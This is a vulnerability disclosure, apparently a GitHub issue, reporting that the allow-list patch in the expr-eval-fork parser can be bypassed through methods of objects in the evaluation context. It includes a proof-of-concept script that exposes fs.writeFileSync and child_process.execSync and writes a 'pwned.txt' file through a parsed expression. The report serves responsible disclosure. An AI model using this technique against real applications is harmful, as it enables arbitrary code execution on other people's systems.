Report security vulnerabilityΒ #289
Description
Bypass : #288
The patch introduced an "allow-list" security model and an isAllowedFunc function to validate callable functions. However, the isAllowedFunc function still permits functions that are members of objects within the values context passed to parser.evaluate(). If an application inadvertently or intentionally includes an object containing dangerous methods (e.g., fs.writeFileSync, child_process.execSync) in the values object, an attacker can invoke these methods via expressions, leading to arbitrary code execution.
POC :
'use strict';
var assert = require('assert');
var Parser = require('expr-eval-fork').Parser;
var fs = require('fs');
var childProcess = require('child_process');
var context = {
write: (path, data) => fs.writeFileSync(path, data),
cmd: (cmd) => console.log('Executing:', cmd),
exec: childProcess.execSync
};
var baoquanh = {
test: context
}
var parser = new Parser();
parser.evaluate('test.write("pwned.txt","Hello!")', baoquanh);